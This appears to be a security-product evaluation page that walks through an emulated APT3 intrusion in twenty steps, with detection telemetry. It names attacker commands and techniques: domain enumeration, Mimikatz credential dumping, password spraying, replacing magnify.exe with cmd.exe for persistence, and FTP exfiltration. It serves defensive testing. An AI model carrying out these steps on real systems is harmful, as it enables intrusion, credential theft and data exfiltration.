Telemetry showing svchost.exe starting terminal service session on Creeper from CodeRed (10.0.1.5)
Telemetry showing Kmitnick RDP logon from CodeRed to Creeper
20.B.1
Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)
System Owner / User Discovery
(T1033)
Telemetry (Tainted)
  
 
Telemetry showed whoami.exe executing from magnify.exe (tainted by sticky keys binary hijack alert).
Execution sequence showing whoami.exe executing from magnify.exe
Process tree view of sticky keys binary hijack alert showing tainted relationship to whoami.exe


Operational Flow

The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

Step 1: Initial Compromise

1.A.1 Execution

User Execution, Rundll32, Scripting

i. Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

1.B.1 Persistence

Registry Run Keys / Startup Folder

i. Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder

1.C.1 Command and Control

Commonly Used Port, Data Encoding, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel established

Step 2: Initial Discover

2.A.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'ipconfig /all' via cmd

2.A.2 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'arp -a' via cmd

2.B.1 Discovery

System Owner / User Discovery

i. Cobalt Strike: 'echo' via cmd to enumerate specific environment variables

2.C.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

2.C.2 Discovery

Process Discovery

i. Cobalt Strike: 'tasklist /v' via cmd

2.D.1 Discovery

System Service Discovery

i. Cobalt Strike: 'sc query' via cmd

2.D.2 Discovery

System Service Discovery

i. Cobalt Strike: 'net start' via cmd

2.E.1 Discovery

System Information Discovery

i. Cobalt Strike: 'systeminfo' via cmd

2.E.2 Discovery

System Information Discovery

i. Cobalt Strike: 'net config workstation' via cmd

2.F.1 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators' via cmd

2.F.2 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators /domain' via cmd

2.F.3 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net group "Domain Admins" /domain' via cmd

2.G.1 Discovery

Account Discovery

i. Cobalt Strike: 'net user /domain' via cmd

2.G.2 Discovery

Account Discovery

i. Cobalt Strike: 'net user george /domain' via cmd

2.H.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key

Step 3: Privilege Escalation

3.A.1 Defense Evasion, Privilege Escalation

Access Token Manipulation, Bypass User Account Control

i. Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level

3.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

3.C.1 Defense Evasion, Privilege Escalation

Process Injection

i. Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe

Step 4: Discovery for Lateral Movement

4.A.1 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd

4.A.2 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Computers" /domain' via cmd

4.B.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd

4.C.1 Discovery

System Network Connections Discovery

i. Cobalt Strike: 'netstat -ano' via cmd

Step 5: Credential Access

5.A.1 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in Mimikatz credential dump capability executed

5.A.2 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in hash dump capability executed

5.B.1 Defense Evasion, Privilege Escalation

Access Token Manipulation

i. Cobalt Strike: Built-in token theft capability executed to change user context to George

Step 6: Lateral Movement

6.A.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)

6.B.1 Command and Control

Commonly Used Port, Multiband Communication, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel modified

6.C.1 Lateral Movement

Remote Desktop Protocol

i. Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)

Step 7: Persistence

7.A.1 Persistence

Create Account, Graphical user Interface, Account Discovery

i. Added user Jesse to Conficker (10.0.0.5) through RDP connection

7.B.1 Command and Control, Lateral Movement

Remote File Copy

i. Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)

7.C.1 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)

Step 8: Collection

8.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd

8.A.2 Discovery

File and Directory Discovery

i. Cobalt Strike: 'tree "C:\Users\debbie"' via cmd

8.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

8.C.1 Collection, Credential Access

Input Capture, Application Window Discovery

i. Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie

8.D.1 Collection

Screen Capture, Process Injection

i. Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie

Step 9: Exfiltration

9.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

9.B.1 Collection

Data from Data from Network Shared Drive, Exfiltration Over Command and Control Channel

i. Cobalt Strike: Built-in download capability executed to a collect file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 10: Execution of Persistence

10.A.1 Persistence

Registry Run Keys / Startup Folder

i. Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32

10.A.2 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32

10.B.1 Lateral Movement

Remote Desktop Protocol, Valid Accounts

i. RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse

Step 11: Initial Access

11.A.1 Defense Evasion, Execution

Scripting

i. Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)

11.B.1 Command and Control

Commonly Used Port, Standard Application Layer Protocol, Standard Cryptographic Protocol

i. Empire: C2 channel established

Step 12: Initial Discover

12.A.1 Discovery

System Network Configuration Discovery

i. Empire: 'route print' via PowerShell

12.A.2 Discovery

System Network Configuration Discovery

i. Empire: 'ipconfig /all' via PowerShell

12.B.1 Discovery

System Owner/User Discovery

i. Empire: 'whoami /all /fo list' via PowerShell

12.C.1 Discovery

Process Discovery

i. Empire: 'qprocess *' via PowerShell

12.D.1 Discovery

System Service Discovery

i. Empire: 'net start' via PowerShell

12.E.1 Defense Evasion, Execution

Scripting

i. Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques

12.E.1.1 Discovery

System Owner / User Discovery

i. Empire: WinEnum module included enumeration of user information

12.E.1.2 Discovery

Permission Groups Discovery

i. Empire: WinEnum module included enumeration of AD group memberships

12.E.1.3 Discovery

Password Policy Discovery

i. Empire: WinEnum module included enumeration of password policy information

12.E.1.4.1 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of recently opened files

12.E.1.4.2 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of interesting files

12.E.1.5 Collection

Clipboard Data

i. Empire: WinEnum module included enumeration of clipboard contents

12.E.1.6.1 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of system information

12.E.1.6.2 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of Windows update information

12.E.1.7 Discovery

Query Registry

i. Empire: WinEnum module included enumeration of system information via a Registry query

12.E.1.8 Discovery

System Service Discovery

i. Empire: WinEnum module included enumeration of services

12.E.1.9.1 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of available shares

12.E.1.9.2 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of mapped network drives

12.E.1.10.1 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of AV solutions

12.E.1.10.2 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of firewall rules

12.E.1.11 Discovery

System Network Configuration Discovery

i. Empire: WinEnum module included enumeration of network adapters

12.E.1.12 Discovery

System Network Connections Discovery

i. Empire: WinEnum module included enumeration of established network connections

12.F.1 Discovery

Permissions Group Discovery

i. Empire: 'net group "Domain Admins" /domain' via PowerShell

12.F.2 Discovery

Permissions Group Discovery

i. Empire: 'net localgroup administrators' via PowerShell

12.G.1 Discovery

Account Discovery

i. Empire: 'net user' via PowerShell

12.G.2 Discovery

Account Discovery

i. Empire: 'net user /domain' via PowerShell

Step 13: Discovery for Lateral Movement

13.A.1 Discovery

Remote System Discovery

i. Empire: 'net group "Domain Computers" /domain' via PowerShell

13.B.1 Discovery

System Network Connections Discovery

i. Empire: 'net use' via PowerShell

13.B.2 Discovery

System Network Connections Discovery

i. Empire: 'netstat -ano' via PowerShell

13.C.1 Discovery

Querying the Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key

Step 14: Privilege Escalation

14.A.1 Defense Evasion, Privilege Escalation

Bypass User Account Control, Commonly Used Port, Remote File Copy, Standard Application Layer Protocol

i. Empire: Built-in UAC bypass token duplication module executed to launch new callback with elevated process integrity level

Step 15: Credential Access

15.A.1 Discovery

Application Window Discovery, Input Capture

i. Empire: Built-in keylogging module executed to capture keystrokes of user Bob

15.B.1 Credential Access

Credentials in Files

i. Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 16: Lateral Movement

16.A.1 Credential Access

Brute Force, Windows Admin Shares

i. Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda

16.B.1 Lateral Movement

Windows Admin Shares, Valid Accounts , Brute Force

i. Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick

16.C.1 Defense Evasion

Network Share Connection Removal

i. Empire: 'net use /delete' via PowerShell

16.D.1 Lateral Movement

Windows Admin Shares, Valid Accounts

i. Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)

16.E.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)

16.F.1 Execution

Command-Line Interface

i. Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick

16.G.1 Command and Control, Lateral Movement

Remote File Copy

i. Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)

16.H.1 Discovery

System Service Discovery

i. Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)

16.I.1 Persistence, Privilege Escalation

New Service, Masquerading

i. Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)

16.J.1 Discovery

System Service Discovery

i. Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)

16.K.1 Discovery

File and Directory Discovery

i. Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)

16.L.1 Execution

Service Execution

i. Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)

Step 17: Persistence

17.A.1 Discovery

System Service Discovery, Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services

17.B.1 Defense Evasion

File Permissions Modification

i. Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe

17.B.2 Defense Evasion

File Permissions Modification

i. Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe

17.C.1 Persistence, Privilege Escalation

Accessibility Features

i. Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe

Step 18: Collection

18.A.1 Discovery

File and Directory Discovery

i. Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

18.B.1 Collection

Data Staged, Data from Network Shared Drive

i. Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)

Step 19: Exfiltration

19.A.1 Defense Evasion

Masquerading, Remote File Copy

i. Empire: File dropped to disk is a renamed copy of the WinRAR binary

19.B.1 Exfiltration

Data Compressed, Data Encrypted, Masquerading

i. Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file

19.C.1 Exfiltration

Exfiltration over Alternative Protocol

i. Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel

19.D.1 Defense Evasion

File Deletion

i. Empire: 'del C:\"$"Recycle.bin\old.rar'

19.D.2 Defense Evasion

File Deletion

i. Empire: 'del recycler.exe'

Step 20: Execution of Persistence

20.A.1 Persistence, Privilege Escalation

Accessibility Features, Remote Desktop Protocol

i. magnifer.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)

20.B.1 Discovery

System Owner / User Discovery

i. Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)